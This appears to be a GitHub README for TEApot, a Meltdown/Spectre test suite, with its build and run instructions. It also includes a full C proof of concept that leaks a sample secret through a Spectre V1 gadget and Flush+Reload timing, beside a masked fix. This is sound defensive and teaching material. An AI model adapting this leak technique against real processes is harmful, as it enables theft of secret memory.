github-3rr0r/TEApot

TEApot (Transient Execution Attack pot) is a project used to evaluate whether your system is affected by Meltdown and Spectre. My goal is to build an easy-to-use (hard to implement) and configurable transient execution attack test suite.
This project is mainly based on the project Transient Fail developed by IAIK. More information can be found in their paper A Systematic Evaluation of Transient Execution Attacks and Defenses (Canella et al., USENIX Security 2019).
Linux with gcc and the other dependent libraries (see the preparation step below).
Developed on 5.4.0-47-generic #51~18.04.1-Ubuntu.
x86 and arm64 are supported.
The suite covers Meltdown-like and Spectre-like vulnerabilities, classified as in the paper A Systematic Evaluation of Transient Execution Attacks and Defenses; the paper explains each type in detail.
These vulnerabilities are supported:
Systematic type name | CVE | Description |
---|---|---|
Meltdown_AC | - | Transient read past an alignment check exception (#AC) |
Meltdown_BR | - | Transient read past a bound range exceeded exception (#BR, BOUND/MPX) |
Meltdown_DE | - | Transient use of the result of a division error (#DE, division by zero) |
Meltdown_GP | CVE-2018-3640 | Spectre V3a, rogue system register read |
Meltdown_NM | CVE-2018-3665 | Lazy FP state restore |
Meltdown_P | CVE-2018-3615/CVE-2018-3620/CVE-2018-3646 | Foreshadow, L1 terminal fault |
Meltdown_PK | - | Transient read past a memory protection key (PKU) fault |
Meltdown_RW | - | Spectre V1.2, write to a page with the read-only flag set |
Meltdown_SS | - | Transient read through a non-canonical address (#SS) |
Meltdown_UD | - | Transient execution past an invalid opcode exception (#UD) |
Meltdown_US | CVE-2017-5754 | Meltdown, rogue data cache load |
Spectre_BTB | CVE-2017-5715 | Spectre V2, branch target injection |
Spectre_PHT | CVE-2017-5753 | Spectre V1, bounds check bypass |
Spectre_RSB | - | Return address misprediction via the return stack buffer (ret2spec / SpectreRSB) |
Spectre_STL | CVE-2018-3639/CVE-2018-3693 | Spectre V4, speculative store bypass (CVE-2018-3639); the project also groups Spectre V1.1, bounds check bypass store (CVE-2018-3693), and NG under this type |
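The Spectre_PHT row is the variant most of the suite's pht_* PoCs exercise, so it is worth seeing the gadget itself. The following C program is an added example for this page, not TEApot's or IAIK's own code: it shows a Spectre V1 gadget (a bounds check the branch predictor can be trained to bypass, with a Flush+Reload side channel on x86-64 to recover the transiently read byte) next to the same gadget hardened with a branch-free index mask. The names array1, array2, secret, victim_vulnerable, victim_hardened, probe_byte and the CACHE_HIT_THRESHOLD value are assumptions made for the example; the mask follows the construction of the generic C fallback of the Linux kernel's array_index_mask_nospec(). Whether the vulnerable gadget really leaks depends on the CPU and the mitigations in effect, which is exactly what the suite's 0/1 result reports; the masking behaviour is deterministic.

```c
/* Added example, not TEApot's or IAIK's code: a Spectre-PHT (Spectre V1)
 * gadget beside its index-masked fix. Build on x86-64 with
 *   gcc -O1 spectre_pht_demo.c -o spectre_pht_demo
 * The covert channel uses clflush/rdtscp and is compiled out on other CPUs. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ARRAY1_SIZE 16
#define STRIDE 512   /* one probe line per byte value, spaced to defeat the prefetcher */

/* Constructed sample data (assumption): array1 is the buffer the victim may
 * legitimately read; "secret" is a string elsewhere in the address space that
 * the bounds check is supposed to keep unreachable. */
static size_t  array1_size = ARRAY1_SIZE;   /* a variable so that it can be flushed */
static uint8_t array1[ARRAY1_SIZE] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
static const char secret[] = "TEApot secret";   /* constructed, not a real secret */
static uint8_t array2[256 * STRIDE];
static volatile uint8_t sink;   /* keeps the probe loads from being optimised away */

/* Vulnerable gadget. While array1_size is not cached the compare cannot
 * retire; if the predictor guesses "taken", array1[idx] is read transiently
 * with an attacker-chosen idx and the byte is encoded in which line of array2
 * becomes cached. */
static void victim_vulnerable(size_t idx)
{
    if (idx < array1_size)
        sink &= array2[array1[idx] * STRIDE];
}

/* Branch-free clamp, the same construction as the generic C fallback of
 * array_index_mask_nospec() in the Linux kernel: the mask is all-ones when
 * idx < size and zero otherwise, with no branch for the predictor to skip. */
static size_t index_mask_nospec(size_t idx, size_t size)
{
    intptr_t mask = ~(intptr_t)(idx | (size - 1 - idx)) >> (sizeof(intptr_t) * 8 - 1);
    return idx & (size_t)mask;
}

/* Hardened gadget: even on a mispredicted path idx collapses to 0, so the
 * transient load can only reach array1[0]. An lfence after the compare is the
 * other common fix; the mask avoids that serialisation cost. */
static void victim_hardened(size_t idx)
{
    if (idx < array1_size) {
        idx = index_mask_nospec(idx, array1_size);
        sink &= array2[array1[idx] * STRIDE];
    }
}

#if defined(__x86_64__)
#include <emmintrin.h>   /* _mm_clflush */
#include <x86intrin.h>   /* __rdtscp */
#define CACHE_HIT_THRESHOLD 80   /* cycles; an assumption, calibrate per machine */

/* Flush+Reload recovery of one byte through the given gadget. Returns the
 * byte value whose probe line was found cached most often. */
static int probe_byte(void (*gadget)(size_t), size_t malicious_idx)
{
    int hits[256] = {0};
    for (int attempt = 0; attempt < 200; attempt++) {
        for (int i = 0; i < 256; i++)
            _mm_clflush(&array2[i * STRIDE]);
        size_t training_idx = attempt % ARRAY1_SIZE;
        /* Five in-bounds calls train the branch, every sixth call attacks. The
         * index is chosen with bit tricks, not a branch, so the choice itself
         * is not predicted. */
        for (int j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) { }
            size_t x = ((j % 6) - 1) & ~0xFFFF;
            x = x | (x >> 16);   /* all-ones when j % 6 == 0, else 0 */
            x = training_idx ^ (x & (malicious_idx ^ training_idx));
            gadget(x);
        }
        /* Time every probe line; a fast load marks the transiently read byte. */
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;   /* scrambled order, again for the prefetcher */
            volatile uint8_t *addr = &array2[mix_i * STRIDE];
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            sink = *addr;
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt <= CACHE_HIT_THRESHOLD && mix_i != array1[training_idx])
                hits[mix_i]++;
        }
    }
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (hits[i] > hits[best])
            best = i;
    return best;
}

/* Leaks "secret" byte by byte through the vulnerable gadget and shows that the
 * hardened gadget yields only array1[0] (value 1) or noise. */
int main(void)
{
    size_t malicious_idx = (size_t)(secret - (const char *)array1);   /* classic PoC trick, relies on layout */
    printf("byte  vulnerable   hardened\n");
    for (size_t i = 0; i < sizeof(secret) - 1; i++) {
        int v = probe_byte(victim_vulnerable, malicious_idx + i);
        int h = probe_byte(victim_hardened, malicious_idx + i);
        printf("%3zu   %3d '%c'      %3d\n", i, v, (v >= 32 && v < 127) ? v : '?', h);
    }
    return 0;
}
#endif
```

Run it on an x86-64 machine; on other architectures only the gadgets and the mask compile. The training loop mistrains the branch in the same address space and at the same branch address, which is the same-address-space, in-place strategy the paper uses to name the sa_ip PoCs. If the vulnerable column spells out the secret while the hardened column stays at 1 or noise, the bounds check is bypassable on that CPU under the current mitigations.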
This test suite allows you to select the vulnerabilities to test with option "-v"; the default is "all", which tests every vulnerability.
You can enable and specify a markdown file as output of the valid PoCs with option "-o".
You can show the simple supported vulnerability options with option "-s".
Option "-m" (test mode) produces a simple result output: 0 means vulnerable, 1 means not vulnerable, and other values mean an error or that the test was not run.
You can use option "-h" to show all help messages, or read the last part of this document.
- lib: Global libraries
- libcache: Cache operation libraries
- libpte: PTEditor, developed by Michael Schwarz, which allows manipulation of paging structures via a Linux kernel module
- meltdown: PoCs of Meltdown-like vulnerabilities
- spectre: PoCs of Spectre-like vulnerabilities
- Makefile: Makefile of this test suite
- run.sh: Main entry of this test suite
- README.md: The file you are reading!
- Some preparation

```sh
sudo apt-get install libelf-dev build-essential pkg-config bison flex libssl-dev libelf-dev bc
sudo apt-get purge libc6-dev
sudo apt-get install libc6-dev
sudo apt-get install libc6-dev-i386
sudo apt-get install build-essential
sudo apt-get install seccomp
sudo apt-get install libseccomp-dev
sudo apt-get install zsh
```

- Clone this repository

```sh
git clone https://github.com/Mashiro1995/TEApot.git
```

- Make

```sh
make
```

- Grant execution permissions and run!

```sh
chmod +x run.sh
./run.sh
# notice that you need to input your password for the kernel operations during this test
```
- Run options

```
Test mode                     : run.sh [-options]
Generation mode               : run.sh [-options] -g [output-path]
Test all vulnerabilities      : run.sh [-o filename] [-m]
Test specific vulnerabilities : run.sh [-v "list of vulnerabilities"] [-o filename] [-m]
Show usage                    : run.sh -h
Show supported vulnerabilities: run.sh -l [-m]
```

Auto mode tests all vulnerabilities covered in this test suite. In manual mode, you can specify the vulnerabilities to be tested with option -v followed by a list of vulnerabilities.

```
-g  generation mode: specify a path in which to save the selected PoCs
-o  enable and specify a markdown file as output of valid PoCs
-v  list of vulnerabilities to be tested; if not specified, all are tested
-h  show usage
-l  show supported vulnerabilities
-s  show simple supported vulnerability options
-t  specify the timeout, default 120s
-m  used in test mode; simple result output will be available:
    0 means vulnerable, 1 means not vulnerable, other values mean error or not tested
```
You can select combination of vulnerabilities with following inputs:
Options | Vulnerabilities to be tested |
---|---|
all | All vulnerabilities |
meltdown | All Meltdown vulnerabilities |
spectre | All Spectre vulnerabilities |
spectre_btb | All Spectre_BTB vulnerabilities |
spectre_pht | All Spectre_PHT vulnerabilities |
spectre_rsb | All Spectre_RSB vulnerabilities |
You can also pass multiple parameters to select specific vulnerabilities, separated by spaces. The suffixes follow the paper's mistraining strategies: sa = same address space, ca = cross address space, ip = in place (same branch address), oop = out of place (congruent branch address).
Options | Vulnerabilities to be tested | Options | Vulnerabilities to be tested |
---|---|---|---|
ac | Meltdown_AC | btb_sa_ip | Spectre_BTB_sa_ip |
br | Meltdown_BR | btb_sa_oop | Spectre_BTB_sa_oop |
de | Meltdown_DE | btb_ca_ip | Spectre_BTB_ca_ip |
gp | Meltdown_GP | btb_ca_oop | Spectre_BTB_ca_oop |
nm | Meltdown_NM | pht_sa_ip | Spectre_PHT_sa_ip |
p | Meltdown_P | pht_sa_oop | Spectre_PHT_sa_oop |
pk | Meltdown_PK | pht_ca_ip | Spectre_PHT_ca_ip |
rw | Meltdown_RW | pht_ca_oop | Spectre_PHT_ca_oop |
ss | Meltdown_SS | rsb_sa_ip | Spectre_RSB_sa_ip |
ud | Meltdown_UD | rsb_sa_oop | Spectre_RSB_sa_oop |
us | Meltdown_US | rsb_ca_ip | Spectre_RSB_ca_ip |
stl | Spectre_STL | rsb_ca_oop | Spectre_RSB_ca_oop |
Examples:

```sh
# Test all vulnerabilities.
run.sh
# Test all vulnerabilities and save the simple result to result.txt.
run.sh -m
# Test all Meltdown and all Spectre_BTB type vulnerabilities, and save successful PoCs to path "codes".
run.sh -v "meltdown spectre_btb" -o codes
# Test all Meltdown and all Spectre_BTB type vulnerabilities, save the simple result to result.txt, and successful PoCs to path "codes".
run.sh -v "meltdown spectre_btb" -o codes -m
# PoCs of Meltdown and all Spectre_BTB type vulnerabilities will be saved to path "codes" without testing.
run.sh -v "meltdown spectre_btb" -g codes
```